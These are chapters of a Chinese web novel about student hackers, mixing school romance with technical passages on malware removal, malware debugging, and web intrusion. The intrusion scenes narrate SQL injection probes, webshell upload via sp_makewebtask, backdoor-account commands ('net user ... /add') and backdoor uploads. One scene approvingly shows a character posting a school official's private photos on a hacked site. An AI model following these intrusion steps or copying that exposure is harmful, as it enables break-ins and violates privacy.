计算机病毒是一个程序,一段可执行码。就像生物病毒一样,具有自我繁殖、互相传染以及激活再生等生物病毒特征。计算机病毒有独特的复制能力,它们能够快速蔓延,又常常难以根除。它们能把自身附着在各种类型的文件上,当文件被复制或从一个用户传送到另一个用户时,它们就随同文件一起蔓延开来。

在《中华人民共和国计算机信息系统安全保护条例》中被明确定义,病毒指“编制者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码”

计算机病毒与医学上的“病毒”不同,计算机病毒不是天然存在的,是人利用计算机软件和硬件所固有的脆弱性编制的一组指令集或程序代码。它能潜伏在计算机的存储介质(或程序)里,条件满足时即被激活,通过修改其他程序的方法将自己的精确拷贝或者可能演化的形式放入其他程序中。从而感染其他程序,对计算机资源进行破坏,所谓的病毒就是人为造成的,对其他用户的危害性很大。

1949年,约翰·冯·诺伊曼完成了第一份关于计算机病毒理论的学术工作,他以 "Theory and Organization of Complicated Automata" 为题的一场在伊利诺伊大学的演讲,后改以 "Theory of self-reproducing automata" 为题出版。冯·诺伊曼在他的论文中描述一个计算机程序如何复制其自身。在当时,病毒一词还未使用。

1980 年,Jürgen Kraus 于多特蒙德大学撰写他的学位论文 "Self-reproduction of programs"。论文中假设计算机程序可以表现出如同病毒般的行为。

1984年弗雷德·科恩(Fred Cohen)的论文《电脑病毒实验》中,首次提出病毒的概念。

1983 年 11月,在一次国际计算机安全学术会议上,美国学者科恩第一次明确提出计算机病毒的概念,并进行了演示。

1986年年初,巴基斯坦兄弟编写了“大脑(Brain)”病毒,又被称为“巴基斯坦”病毒。

1987年,第一个电脑病毒C-BRAIN诞生。由巴基斯坦兄弟:巴斯特(Basit)和阿姆捷特(Amjad)编写。计算机病毒主要是引导型病毒,具有代表性的是“小球”和“石头”病毒。

计算机病毒有几大特性,繁殖性、破坏性、传染性、潜伏性、隐蔽性以及可触发性。

病毒的传播不仅限于电脑之间,一日,林雨生有个朋友把他的手机插到他的电脑上下载东西,为了安全其间,林雨生决定先杀杀毒,可是瑞星却突然打不开了,可怜的瑞星啊!连叫一声的机会都没有,就光荣下岗了。没办法只好手工杀毒了。

既然瑞星已经光荣下岗,林雨生首先想到的是使用冰刃来查看可疑进程,可是冰刃竟然也打不开了,后来他又试了下杀毒助手,syscheck等发现都打不开了,真是郁闷。接着他又想查看隐藏的文件,看到底是什么病毒。竟然也不让他查看,看来又是注册表的隐藏文件设置被修改了,于是林雨生只好写了个批处理来恢复回来。

保存为显示隐藏文件.bat,执行后终于看见病毒真面目了——meex.exe。到百度上搜索一下,竟然说是什么七位随机病毒?林雨生看了一下其他文件,还真都是七位的。

既然知道了,是什么病毒,下面就开始手工查杀了。既然目前流行的反病毒工具都不能使用,林雨生就想到了IFEO劫持,就是通过在注册表HKEY_LOCAL_MACHINE_\Microsoft\Windows NT\CurrentVERSION\Image的目的。他在运行栏目里输入regedit打开了注册表,来到上述键值下,果然发现很多目前流行的反病毒工具都被列入了黑名单中,难怪冰刃无法使用。因为这个病毒还在每个程序的子键下建立了同样的子键debugger来指向C:\program Files\Common Files\Microsoft Shared\snladed.exe,看来运行任何一个程序都会导致病毒的重生。

于是林雨生删除掉了icesowrd对应的键,重新运用冰刃,这回正常打开了,发现有异常进程snladed.exe和nbxbbkb.exe,于是选中这两个进程结束掉。然后又在运行栏目里输入msconfig打开系统配置实用程序,查看里面有没有可疑的启动项,果然发现了两个可疑的启动项snladed:C\program Files\CommonFiles\Microsoft Shared\snladed.exe和nbxbbkb.exe;”C:\Program Files\Common Files\System\nbxbbkb.exe”,选中它们后当然是禁用了。接着到HKEY_LOCAL_MACHINE_\Microsoft\Windows\CurrentVersion\Run下删除掉snladed.exe和nbxbbkb.exe这两个键值,再转到该目录下删除病毒程序,使用冰刃的文件查看功能,来删除那两个病毒文件。最后直接删除整个键值,避免程序无法创建,至此整个杀毒过程就结束了。

林雨生的手工杀毒之旅终于完成了,不过还没有最终结束,清除完病毒后,一定要使用升级到最新病毒库的杀毒软件,再彻底的查杀一遍,然后使用安全工具修复一下系统,并利用autoruns查看一下启动项,看是否还有其他的程序被感染,最好再使用一下注册表修复工具,修复一下注册表。

病毒依附存储介质软盘、 硬盘等构成传染源。病毒传染的媒介由工作的环境来定。病毒激活是将病毒放在内存, 并设置触发条件,触发的条件是多样化的, 可以是时钟,系统的日期,用户标识符,也可以是系统一次通信等。条件成熟病毒就开始自我复制到传染对象中,进行各种破坏活动等。

病毒的传染是病毒性能的一个重要标志。在传染环节中,病毒复制一个自身副本到传染对象中去。

俗话说的好:常在江湖飘,哪能不挨刀!别说是林雨生,就是危险漫步有时候也会中招。揪出病毒后,危险漫步把病毒提取出来进行调试分析,首先用peid查壳,发现没有加壳,程序是使用Microsoft Visual C++ 6.0编写的,没有加壳其实是件好事,毕竟脱壳也是一件很累人的活儿,有时一些强壳还会把人玩得晕头转向。

既然没有加壳,那就直接使用OD载入程序,一般来说是先查看ASCII码,看有什么有用的信息,这跟软件破解的步骤是一样的。通过查看ASCII码,可以发现信息。

其中\msacm32.drv和explorer这两处地方比较可疑,双击\msacm32.drv跟随进去,发现代码。

在0x2123127D这个位置调用的api函数是GetWindows DirectoryA,这个函数的作用是获取Windows目录的路径名。继续往下查看,发现了代码——创建了一个虚拟桌面。

继续向下研究,发现病毒创建了explorer进程。

联系代码就可以初步猜测到病毒是创建了虚拟桌面,然后在虚拟桌面启动explorer进程。目前从ASCII码里得到的信息大致就是这么多了,可还是不知道病毒的主要作用是什么。现在开始调试程序,调试的时候可以慢慢的单步仔细的进行分析,可是这种方法太累人。危险漫步个懒人,所以直接使用下断点的方法进行调试。断点中哪儿下呢?通过对函数下断,在OD里点右键,选择“查找”一一“当前模块的名称”,就可以查看调用的函数了。

危险漫步发现FindResourceA这个函数非常可疑,点击右键选择“在每个参考上设置断点”,然后按F9运行程序。

程序被断在了0x21231342处。

此时的整个流程就很明显了:首先是查找资源,然后提取资源释放到系统目录,释放出来的文件是msacm3.2.drv。继续单步就可以看到病毒已经往释放出来的文件写入内容了。

单步跳出这个子程序就来到了之前创建虚拟桌面的地方,继续单步就看到了进程退出代码。实际上这个病毒最后还会有个毁尸灭迹的行为,再次查看当前模块,可以看到一个函数WinExec。这个函数的作用就是运行指定的程序,重新加载程序后对这个函数下断,按F9运行后观察附近的代码。

首先是获得执行命令的参数“/c del/f”,并保存在寄存器eax中。其中GetEnvironmentVariaoleA获得了环境变量的值,并且把cmd的目录作为变量连同之前的命令行保存在了寄存器eax里。

最后调用WinExec函数采用隐藏方式来执行命令,也就是自删除的操作。

这时候病毒主体文件在完成自己的工作后就自尽身亡了,真正的罪魁祸首就是释放出来的msacm32.drv文件。接下来就该对这个文件进行分析了。这个文件是个dll,反汇编就可以看到其真面目了。首先将其后缀修改为exe,然后使用OD载人,如果是exe文件的话载入的时候是没有任何问题的,而如果是dll文件的话,由于dll是无法单独运行的,所以OD会提示启动LOADDLL.EXE进行dll的加载。成功加载后先单步一会儿,因为对dll的调试不同于exe文件,一开始就查找ASCII或者是输入表的话是得不到任何信息的。单步的时候遇到回跳的地方一律按F4跳过去,不一会儿就来到了模块入口点。

现在就可以查看当前的模块信息了,结果看到了几个极为可疑的函数。把断点下的靠前一些,在free函数那儿下断,按F9运行后就来到了下面的位置。病毒释放出来的msacm32.drv是伪装对应原系统的正常文件,然后对之前创建的虚拟目录里运行的explorcr.exe进行注入,并且在注入的代码中使用LoadLibrary和GetProcessAddress进行强制加载。

病毒就分析结束,最后把它杀掉就可以了。打开冰刃,查看expLorer进程的模块信息,找到C:\WINDOWS\msacm32.drv将其卸载掉,然后直接删除c:\WINDOWS\目录下的msacm32.drv文件即可。

 

 第二十四章  Lighters


Lighters车队的队长方小小之所以把车队命名为Lighters,主要是因为她很喜欢Lighters这首歌,萧让也很喜欢音乐,两个就音乐开始,话题越来愈多。

萧让自从得知老友去世的消息之后一蹶不振,整天沉迷于网络,方小小便赖着萧让带她任务,萧让带她升级,带她装配,带她在游戏里尽情地飙车。

一日,萧让问小小,“你欠我这么多,怎么还?”小小迟疑了一下,发:“嫁给你呗。”

萧让的心砰砰地跳,那边见萧让不回消息,问:“怎么,不乐意啊。”

萧让回:“当然乐意。”

方小小:“那你怎么回得怎么慢。”

萧让:“告白这种事情,应该由男生来说的。”

方小小:“谁跟你告白了。”

……

纪伯伦说,真爱倒来的时候,总是气势磅礴,冲开一切不可阻挡。事实即是如此。萧让与方小小感情进展迅速,两个人私聊也就罢了,还去群里秀恩爱,先是在Lighters群里秀,接着跑到萧让的群里秀,萧让群里的人见方小小冒泡,甚至说“撒狗粮的来了”。

从最初的游戏,到后期人生或者理想无所不谈,萧让比较随性,对人生理想什么的根本没有什么追求,他对方小小说:“我本来有个理想,保护地球。现在,我只想保护你。”

方小小:“我的城市下雨了,你却不能问我带没带伞。”

萧让安慰道:“会见的,放心吧。”

萧让整天泡在电脑前,计算机已然成为了他生活的全部。

“老萧沉浸在方小小的温柔里,沦落在甜蜜的毒药里。”危险漫步如是说。他觉得现在团队的状况非常不好,林雨生整天和田依腻歪在一起,萧让整天和电脑那头的方小小腻歪在一起,危险漫步除了找楚虹腻歪,别无选择。

一日,危险漫步和林雨生去学校面试单招,如果单招成功,他们就可以被古店商学院录取。进班主任办公室的时候,商学院的老师还没有来,班主任和他们俩个有一句没一句的聊天。危险漫步和汪青蓝虽然经常旷课,但是和班主任的关系相当不错,三人聊着天,气氛十分愉快。

带负责单招的老师过来的人是副校长,这个副校长曾经也是危险漫步和林雨生的计算机老师,不过,这个老师并不喜欢他们两个,因为他讲课时候的谬误,都会别危险漫步大声纠正。

“这就是危险漫步和林雨生。他们两个的资质都非常好,也很聪明。商学院的计算机系是非常闻名的,我相信这两个学生的才能足以进入计算机系。危险漫步有着过人的天赋,他曾多次入侵我们学校的官网,技术彪悍,我们也没辙啊。

“林雨生曾是东洲高中的学生,你也知道,东洲高中是省种重点学校,但是处于危险漫步的邀请,他来到了我们古店中学。林雨生计算机技术的技术进步很快,上个月,我们学校的官网被黑了一次,有不少流言多称是林雨生干的。”

副校长笑呵呵地说着,危险漫步脸色一变,随着也换了副笑脸,“副校长过奖了,副校长栽赃陷害又行贿终于爬上了这一高位,手段手段无所不用其极。不过,既然副校长已经升迁了,我还是得恭喜你,但是,我还是有一句话要提醒的——大事小事,皆为己任,记得注意学校的官网。”

副校长终于笑不出来,办公室人很多,他也不好多说什么。负责单招的老师和危险漫步早就认识,此番听见这写对白,也不较真。再者,危险漫步进商学院,已是板上钉钉的事情,他今天来查看的,主要是林雨生的问题。

商学院的老师打开笔记本交给林雨生,“我们学校一定存在一些尚未发现的漏洞,能不能请你尝试着入侵?”

林雨生愣了一下,想这个老师还真是奇怪,出的题目竟然是要入侵自己学校的网页。那个老师似乎看穿了危险漫步的心思,说:“其实有点不好意思呢,这样简直是让你免费为我们学校做一个安全检测。”

林雨生点了点头,疑虑顿消。林雨生这一段时间进步很快,不过,入侵这一方面他倒没有太多的经验,事到如今,只能看看之前学到的理论能不能发挥作用了。

手工检测出该网站存在注入漏洞。不过,先不注入,直接在网址后面分别添加8080和8888端口进行访问,但都返回了空白页面,没有出现Tomcat的后台页面,看来是管理员把Tomcat后台删除了。

在网址后面添加upload.jsp,也没有出现上传的页面,重新返回到网站主页,刚才竟然没有注意到在网站右下角有管理员登录的地方,直接点击进去后,试着使用“'or'='or'”登录失败了。还是来爆破一下密码吧,在注入点后面添加“order by 6”提交,返回了正常,添加“order by 7”提交,返回了错误,可以确定字段数为7,继续来判断一下数据库是什么版本的,在注入点后面添加“%20and%20%20@@version>0”提交,可以看到服务器使用的是SQLServer的数据库。

SQLServer的数据库不支持union select查询,暂时就先不考虑走爆破密码这条路了,直接把注入点抛给ID检测下,看看是什么权限,居然显示是个SA权限。林雨生心中一喜,既然是SA权限那就好办多了,如果3389是开放的,直接添加帐户就可以了,当然前提是xp_cmdshell没有被删除。

还是先弄个webshell到服务器上吧,使用啊D列了N分钟的目录,终于找到了web的绝对路径为“x:\Tomeat\webapps\jrxynew\xsyd”,林雨生本想使用echo命令直接写一个.jsp一句话木马进去,但是echo命令写入失败了,既然写入失败那就备份一个jsp一句话木马吧,但是他在备份的时候不管内容是什么和后缀是什么类型,都出现了乱码不能正常解析,一句话木马的客户也不能正常连接,备份的时候只写了“菲test”这两个字,后缀是txt的,但也解析成乱码了。

林雨生有些慌乱,额头上沁出汗珠,双手停止在键盘上敲动,仔细想想下一步该怎么做。危险漫步在一边看着他,一脸自信。他并不慌张,林雨生的能力他最清楚不过。商学院的老师依旧笑眯眯的,并不催促。

林雨生一时半会儿找不出原因,决定另辟蹊径。在SA权限下还可以使用sp_makewebtask存储过程来上传一个jsp一句话木马,为了加快速度,林雨生选择用穿山甲上传。这次,上传成功。使用jsp一句话木马的客户端成功的连接上了,然后林雨生上传了一个jsp大马。

在webshell里执行ipconfig命令,成功了,服务器原来是在内网中的,使用的居然还是Windows系统。内网可以使用Lcx把3389转发出来,然后在连接就可以了,在webshell里执行"netstat -a”命令查看了下端口,发现3389开启了。

林雨生试试能不能添加账户。分别执行“net user fei 123456/add”和“net localgroup Administrators fei /add”,添加用户成功了,看来这个网站已经有前人来过了,这么多的不明账户啊。由于电脑也是处在内网中,而且也没有路由器的权限,就不转发端口了,到此整个入侵就结束了。

老师合上笔记本,他对林雨生的表现很满意,他握着林雨生的手,代表商学院,郑重向林雨生发出邀请。

回到公寓,在楼道里都能听见房里传来的音乐声。林雨生指了指脑袋,危险漫步耸了耸肩。

萧让放的歌是《恋人心》,从一个星期前开始,萧让就天天放这首歌——因为方小小喜欢唱给他听。萧让很享受音乐的过程,却让他的两个伙伴烦透了。

“老萧,你再不把音乐关小点,我就把你床照发到你们学校的官网上。”危险漫步话音未落,音乐的声音顿时小了很多,不过老萧还是神龙见首不见尾,直到吃饭时候也没出来。

危险漫步和林雨生吃完饭,天已经黑了。他站在院子里,忽然想起和萧让在这里打架的事。记得那一天大雨滂沱,虽然记忆犹新,但的确是两三年前的事情了。或许,两个人的命运,在那一刻就发生改变也说不定。

林雨生见危险漫步神色有些感伤,问怎么了,危险漫步摇头,说只是想起了一些老故事。带着怀念的心情,危险漫步拾上公寓的台阶,一瞬间,《恋人心》的声音又大了一倍。


 第二十五章  季


清晨第一缕阳光透过窗帘,夜并未舍得离去,整个房间里充斥着既昏暗又明亮,玄幻交错的错觉。橙黄色的光赋予空间复杂的衰败意向,时空仿佛被定义到未来。

门被轻轻打开慢悠悠发出的吱吱声,似乎划破了这一寂寞的设定。黑色的休闲裤,白色的过于肥大的T恤。世界是静止的,世界在光速移动着。危险漫步把雷蛇机械敲得啪啪响,过了一会儿,林雨生从房间里出来,洗漱完毕,两个人一起像学校走去。

这一天是古店高中的毕业典礼。

太阳完全升起,清晨那股清凉已经不见。炎炎夏日,没有一丝风。路上同学多带着笑脸,就连那些哭丧着脸走出考场的人,此时脸上也不再有哀愁。从这天开始,很多人将分道扬镳,还有很多,过了今天,可能再也不会见面了。

危险漫步的内心有些复杂商学院已经告诉他,他和林雨生被录取了,此番去参加毕业典礼,不过是一个过场而已。可是,与其说是过场,更不如说是一个盛大的节日,它宣布了很多事情的结束,也宣告更多事情的开始,在这一刻,无论脸上挂着的是成熟还是稚嫩,都会长吁一声,接着感叹一下人生。

前方是未知,迎面是海风。

走吧。危险漫步拉了拉林雨生,再过一个街道,学校就到了。这个时候,人的内心总是出奇的宽容,这种宽容造成很多人对做出偏激行为的忏悔。

林雨生很有默契地问:“发生什么事了?”

危险漫步摇了摇头,叹了口气。早上的时候,他又把学校的官网给“桃色”了。这一次,他公布的是两个副校长的底下恋情。其中一个副校长自然就是为老不尊的计算机老师,本想入侵他的电脑,看看有没有记账的小本本之类的东西,没想到这个老师谨慎得很,又是计算机专业,所以短时间内,未能让危险漫步发现经济和政治方面的问题,结果危险漫步不懈努力,终于找到了可以“交差”的东西,虽然他内心很排斥把桃色照片挂在学校的网站上,但是翻遍该电脑,也只有这几张照片。

但愿学校的管理员能够即时发现。

毕业典礼在操场上举行,前方临时搭建了一个舞台,表演节目的表演节目,领导讲话的讲话。节目非常无聊,离得又远,看得不清楚。领导的讲话更无聊,颠来倒去的理论,危险漫步有把握说个一小时不用准备。

可是,这个毕业典礼基本没人缺席,过了今天,大家各奔东西。离别总是不舍的,炽热的阳光是那么的违和。校园里的合欢花开得很漂亮,只可惜,这些合欢以后再也不是他的了。

也许,从来都不是他的。

楚虹看着台上表演的学生,满眼的羡慕。危险漫步摸了摸她的头,“明年你也毕业了,不过,毕业的时候你就不羡慕了。”楚虹用力地把危险漫步的手甩开,“要你管。”

无论处于哪种原因,也许离别,总会是不舍的吧。汪青蓝此刻看着周围的同学,由衷地感慨。他已经确认被保送心仪的大学,那么周围的命运又是怎么样的呢,尤其是文欣。汪青蓝忍不住测过脸,看边上女孩可爱的面容。白皙的皮肤像瓷器般光洁,常常的睫毛如静止的蝴蝶,保护着她瞳孔里的星辰。乌黑的头发垂在肩上,马尾慵懒地扎在脖子后方。

多年以后,汪青蓝还是能清楚的记得第一次见到文欣时候的情行,他被着书包,被老师安排坐到她的旁边。女孩文静地伏在桌前写着什么,然后抬起头,四目相对。女孩笑了笑,说,你坐这边吧,这一竖排做的都是男生。然后挪身到一边,汪青蓝便坐刚刚她坐的位置。女孩功课优异,毫无悬念进入东州最好的学校。汪青蓝的成绩逊色不少,东洲初中平时考试的考场都是按成绩排,文欣平日稳坐第一考场的位置,而汪青蓝,一般都在第三考场,只有一次,因为数学超长发挥,进了第二考场。

学校的阅览室很大,因此一二考场都在阅览室里。汪青蓝惊奇地发现,文欣就在自己的身后。那一次考试,汪青蓝一塌糊涂。

接到东洲一中的电话,汪青蓝也很惊讶,不过他把这成为冥冥之中注定的缘分,像那次超常发挥,进入阅览室,和文欣相见一样。

萧让一觉起来已是下午三点,恼恨昨晚睡得太迟,又怨早晨总是起不来。

恶性循环。

出门走走,夏天已经切切实实地倒来了,这是他最喜欢的季节。

街上的行人很多,万人空巷,车水马龙。不知不觉,走入一条窄巷。巷的一边是一排围墙,里面有树枝越出墙外。树枝上站着不知名的鸟,叽叽喳喳地叫着不停。

诗人们说这是在歌唱。歌声没能引起萧让任何共鸣,倒是引起了萧让的饥饿感,他出门匆忙,兜里只有昨天剩下的十块钱,手机又没有电,萧让叹了口气,莫名其妙觉得有些悲伤。

前不远有一间拉面店,走进去,胖师傅正坐在椅子上打瞌睡。

萧让说要一碗肥肠炒饭,胖师傅似醒非醒,懵懵懂懂地说:

“不好意思,没有米饭了,只有面。”

萧让正犹豫着,忽然想起前面还有一家店,便退了出来。

这间店并不大,打扫得很干净。店内没有其他客人,只有一个男人正在拖地。他约莫三十岁的样子,干净的短发,消瘦的身材。见我进来,他放下手里的活,问萧让想吃点什么。萧让接过菜单,脑子里想的却还是刚才菜谱上的“肥肠”,搜索一阵,并没有发现。

“没有香肠炒饭吗?”

“没有,我们清真,所以……”

“哦哦,不好意思不好意思,嗯——兰州炒饭是什么?”

“是用牛肉和鸡蛋炒的,当然,还有其他的一些菜。”

“嗯,好,就这个吧。” 过了一阵子,饭端了上来,很快地,他又端过了一小碗汤和一碟菜。萧让想起过去和朋友去玉米人喝粥,朋友要了一叠小菜,服务员说没有,只有这种菜,6元。朋友和服务员吵了起来,说喝粥怎么可以没有小菜?小菜要求不高肯定会送的啊!

想到这里,萧让哑然失笑。第一次吃到免费的小菜,不知怎的,却有些难过。

饭盛得很多,萧让觉得很难吃完。他吃得很慢。那个男人走出店,抽了一根烟。他回来后,萧让很想和他聊些什么,最终,什么话都没有说。萧让吃了半个小时,期间老板娘买菜回来,怀里还抱着她的女儿。他抱过她怀里的孩子,亲昵的吻孩子的脸颊。

走出店,我感觉吃得很撑——所有的饭都被我吃完了。

后来,萧让常常想再去吃一次,却一拖再拖,等他从赤诚回来的时候,那家面馆已经倒闭了。

夏天啊,从地里的蝉蛹到树上的蝉,街道两边氤氲开的合欢总是在一场雨后散落一地。有时候危险漫步会带危险漫步出去玩,已经记不清当时怎么度日,只知道嫌时间太短。危险漫步习惯把作文通讯念成作文鱼帆,有时候弟弟会缠着他一起打电动,或是父亲夜班时他来危险漫步的家里通宵。总是在放假前就把作业匆匆赶完,然后漫长的一个夏天,西瓜,院子后面只能结6个桃子的桃树。手里两毛的冰块。傍晚回家偶尔能闻见卤牛肉的味道,连接两个月时间的海。记忆里很多个夏天 都过去好几年了。

危险漫步向来觉得夏天是很长的,它蔓延了一年里的大半个时间。危险漫步又觉得夏天很短,他从来不能抓住夏天的尾巴,夏天总是在一瞬间就消失了,无影无踪。

商学院开学时举办了一个活动,学校各系派出一名骨干,深度讲解自己的专业。其突出的重地是深度、专业。一般来说,大四的学生不会参加这样的活动,所以各系拍出的代表都是大三的学长,唯有计算机系,派出的骨干是大一的危险漫步。着并非计算机系没有人才,而是危险漫步实在太彪悍了。通过海选的10名计算机精英,拿下老师手里电脑的服务器权限就算胜利,老师等了半天,一点动静没有,再看下面的学生,除了危险漫步,一个个皆愁眉苦脸的——他们的电脑首先被危险漫步干掉了。

会场在学校最大的阶梯教室,计算机系被安排在了第三天的上午,报告会开始的时候,阶梯教室里已经挤满了人,危险漫步别的不说,先从黑客说起。黑客总是神秘的,神秘的东西总是吸引人。

危险漫步从最早出现的窃客开始说起,到凯文米特尼克等传奇大黑客风光历史传入中国,再到特洛伊木马程序的出现。

1998年印尼排华事件激怒了众多中国黑客,该事件促使中国的黑客团结起来,铸就了以“团结和坚强”为主旨的初中的黑客精神。

再接着,中国驻南斯拉夫大使馆被炸,中美黑客大战,中国的黑客从此在世界占据了一席之地,黑客精神里又加入里新的血液。

爱国的中国黑客收拾完老美,随后又收拾了抛出“两国论”的台湾,名声大噪。中国的黑客软件木马冰河在这次战斗中展现了强大的战斗力,并直接刺激了后来更多的优秀黑客软件的出现。随着互联网的发展,黑客工具看是泛滥,脚本小子越来越多,黑客队伍鱼龙混杂,整个群体也开始浮躁起来。中国黑客的阵营逐渐分化。正是应为这种极度的分化,黑客大联盟的时代一去不复返,分散的小团体取而代之。

生动的演讲加上身后的幻灯片,危险漫步将观众的好奇心牢牢抓住。

危险漫步:“现在和大家说一说,360安全卫士查杀流氓软件的原理。相信大家都会使用安全软件,那么安全软件的原理是什么呢?我用360简单和大家说一说。”

故事开始源于一次中毒,一个盗号木马,金山毒霸报毒,一个口气删了三个文件:两个DLL文件和explorer.exe。其中Explorer.exe路径是正确的,明明就在C:\windows目录下。这两个DLL注入到Explorer.exe进程中害得Explorer.exe一起被删除了。Explorer.exe被删除的结果当然就是系统重启后桌面没有了。调出任务管理器试图从%system32%/dllcache中找出Explorer.exe复制回windows目录下,却提示无法复制。唯一的解释就是金山毒霸在作怪。危险漫步一气之下把金山毒霸关了后果然复制成功。windows目录不能复制过去,%system32%目录总可以了吧,复制过去后并把注册表的HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\中的shell键值指向了c:\windows\system32\explorer.exe,重启后桌面还是没有出现。问题没有解决,无聊之中危险漫步乱点,点到了360安全卫士,报告说发现了恶意插件,一看居然是c:\windows\system32\explorer.exe。这个文件明明是从dllcache中复制过去的,使用金山毒霸查杀c:\windows\system32\explorer.exe并没有报毒。运行它也没有问题,桌面出来了,系统一切正常。难道是360安全卫士查杀流氓软件依据路径和文件名?危险漫步开始并不相信,后来又动手做了几个试验,证实确实是如此。

按照上面的推断,如果文件名和病毒名相同的话并且出现在不该出现的目录中(比如explorer.exe应该只在windows目录下,不过危险漫步已经把它复制到了system32目录中了),360报毒。以前有个落雪病毒不是很嚣张吗?“假造”几个落雪病毒来试试360安全卫士。上网搜索得知,落雪病毒会在system32目录下生成dxdiag.com、MSCONNFIG.com、EXERT.exe等文件。新建一个空的记事本文件,然后依次把文件名改成dxdiag.com、MSCONFIG.com、EXERT.exe。由于是空的记事本,大小当然是0,更不会是病毒木马。接着复制到system32目录中,再启动360安全卫士进行查杀,危险漫步证实了自己的想法。

这里360只列出了dxdiag.com这个文件,如果删除掉它,360又会列出MSCONFIG.com等等。到这里已经可以充分证明360的查杀依据了:路径和文件名。那个spoolsvc他不知道是什么,没有带路径,可是那个所谓的“伪explorer.exe下载者”确实是他复制过去的,一点“清除选定选”。运行的桌面马上就被关闭了,这证明金山清理专家也差不多,好不到哪里去。

底下的学生多半没有深层次的研究,至于哪款软件杀毒又用什么方法更是兴趣寥寥,危险漫步原先说发展史个个竖起耳朵,现在也没那么专心了。危险漫步决定把入侵提前讲了。

“我们商学院的网页在很刻板,很不好看,对不对,那么,有没有方法改成我们喜欢的样子呢?我们平时只能访问商学院的网页,看几则不痛不痒的消息,我们是否可以像编辑我们的QQ空间一样,编辑商学院的网页呢?”

听见危险漫步这般说,底下瞬间安静起来,继而很快又出现窃窃的讨论声音。

“入侵!”

听到自己想要的答案,危险漫步满意地点了点头,“这位同学说的没错,入侵后拿到权限,的确可以修改网页,那么,大家会入侵么?”

下面齐声道:“不会!”

危险漫步:“好,接下来我就给大家介绍基础的入侵。黑客的攻击手段有很多,我今天主要为大家演示其中的两种,sql注入攻击和溢出攻击,现场的同学可能很多都看不明白,没关系的,我会给大家做一些解释。不过,当然不是 拿我们商学院的网页做实验,那样的话校长大人会请我过去喝茶的。等下演示的时候会是一个论坛,我朋友的。”

危险漫步打开面前的电脑,接好投影机,会场的大屏幕就开始显示他电脑上的画面了,他打开一个网页,显示出来是一个bbs,“这是一个论坛,大家仔细看一看,会不会觉得很熟悉?没错,这跟我们商学院的bbs是一模一样的,采用的是同样的程序代码!”

学生们兴趣满满,画面显示出来的论坛确实和商学院的bbs很相似,只是换了块logo而已。

人们激动地发抖,暗暗想这得好好学习,成功了之后就把××网给干掉,早就看它不爽了!

“现在的网站,99%都要用到数据库,所谓的sql注入,就是利用网站对提交数据过滤不严格的漏洞,在提交数据的时候插入一些数据查询语言,从而获取自己想得到的信息的一种黑客手段。”危险漫步简单介绍了一下,也没指望底下人的人明白,他在电脑上演示道:“比如我现在访问论坛的这个页面,我在网址后面添加了一句sql判断语句,这句代码的意思也很简单,就是问1=1是不是正确的。答案肯定是正确的,所以我一敲回车键,大家就都看到了,页面正常打开了。

“但如果我问1=2是不是正确的,大家再看,网址提交之后,网页无法正常显示,服务器返回了错误的提示!这是为什么呢?因为1=2本身就是错误的,所以服务器在分析之后,认为你提交的这个网址是错误的,它就不会显示。”

“那么大家现在想到了什么?”危险漫步突然问着现场的人。

现场没人回答,这很正常啊,正确的答案就显示,错误的答案就不给显示,这能说明什么问题呢,难道问一些1等于几的问题就能入侵了吗?

危险漫步等了一会,看没有人回答,就笑了笑,道:“大家想一想,如果我提交的sql语句不是询问1=1是不是正确的,而是问论坛管理员的账号是不是叫做admin啊,他的密码是不是12345啊,那么网页会告诉我们什么样的信息呢?”

顿时就有些人明白过来了,“妈的,这太神奇,如果论坛管理员的账号真的是admin的话,那么网页就会正常显示出来,不是的话,网页就出错,这一个个试下去,总能试出管理员的账号是什么,还能试出他的密码!”

危险漫步看很多人有些明白的样子,便继续道:“当然,这只是最简单的判断语句了,sql语句有很多种,有查询,有判断,有增加,有删除,最重要的是,还有修改。大家想要了解sql注入究竟是怎么一回事的话,就得去好好学习一下sql语言,这个并不难,语言格式都是固定的,只要不开小差,认真怼个几个小时就掌握了!”

底下的人一片骚动,骚动的原因不是因为怼几小时能回sql语言,而是自认为几个小时就掌握了入侵。他们看危险漫步的目光,仿佛眼前是令狐冲、杨大侠。

危险漫步在论坛上点了点,道:“大家都看到了吧,论坛的管理员账号确实叫做admin,这个都不用去输入查询语句,论坛列表就有显示,我们知道了他的账号,去猜他的密码,只是个迟早的事情,但这似乎有点浪费时间了,我们是不是考虑一下使用修改语句呢,我们可不可以利用sql语句直接把他的密码改为12345呢?”

危险漫步点了论坛登录,输入账号admin,然后又输入密码12345,登陆的时候,论坛提示密码错误,无法登陆,“大家看到了吧,管理账号此时的密码并不是12345,现在我们使用刚才的方法,在网址后面插入sql语句,将它的密码修改为12345。”

噼里啪啦在一个网址后面输入一大段sql语句,一敲回车,网页正常显示了,危险漫步道:“现在页面正常显示了,这就是告诉我们,密码修改成功了,如果不成功的话,是会提示错误的!”

危险漫步又回到登陆界面,输入了账号和密码12345,这回大家看得非常清楚,竟然顺利登陆了,密码已经变成了12345。这也太神奇了吧,只是往平时司空见惯的网址后面添加了一小段代码,竟然就把管理员的密码给修改了,要不是亲眼所见,大家谁也不敢相信啊。

性急的人,就直接举手了,“那啥,危险漫步大哥,你能不能把刚才的代码重新写一遍,我好记下来!”,不知道的还以为他好学呢,知道的就明白这小子肯定是没安好心,肚子里指不定憋着什么坏水呢。

危险漫步笑,“写十遍都没有问题,但这代码并不通用,我能成功,你可能就不会成功。因为你还必须去了解网站的数据库结构,不同网站的数据库结构是不同的,也不是每个网站的都存在这种漏洞。”

那小伙很受打击,闷闷地缩回去不吭声了。

“拿下论坛,并不是我们的终极目标,我们是要靠着这个论坛管理员的身份,拿下这台服务器,大家有没有什么想法?”危险漫步很是善于利用发问来调动大家的积极性。

很多人连之前的演示都没看明白呢,现在哪能提出什么意见,要是会入侵,大家也就不用来这里听报告会了。

“论坛有个功能,叫做上传,可以上传一些图片之类的附件到论坛上去,这个大家肯定知道吧!”危险漫步笑,“我们要利用的就是这一点!现在大家看看来管理员的界面,发现没有?管理员是可以设置上传附件的类型和大小的,我手上有个后门程序,格式是exe类型的,那么我就把exe文件设置为可以上传。”

危险漫步设置成功,打开发新帖的界面,把一个exe文件上传到论坛去了,也就是说,他把一个后门程序放到了那台网站服务器的硬盘里了。

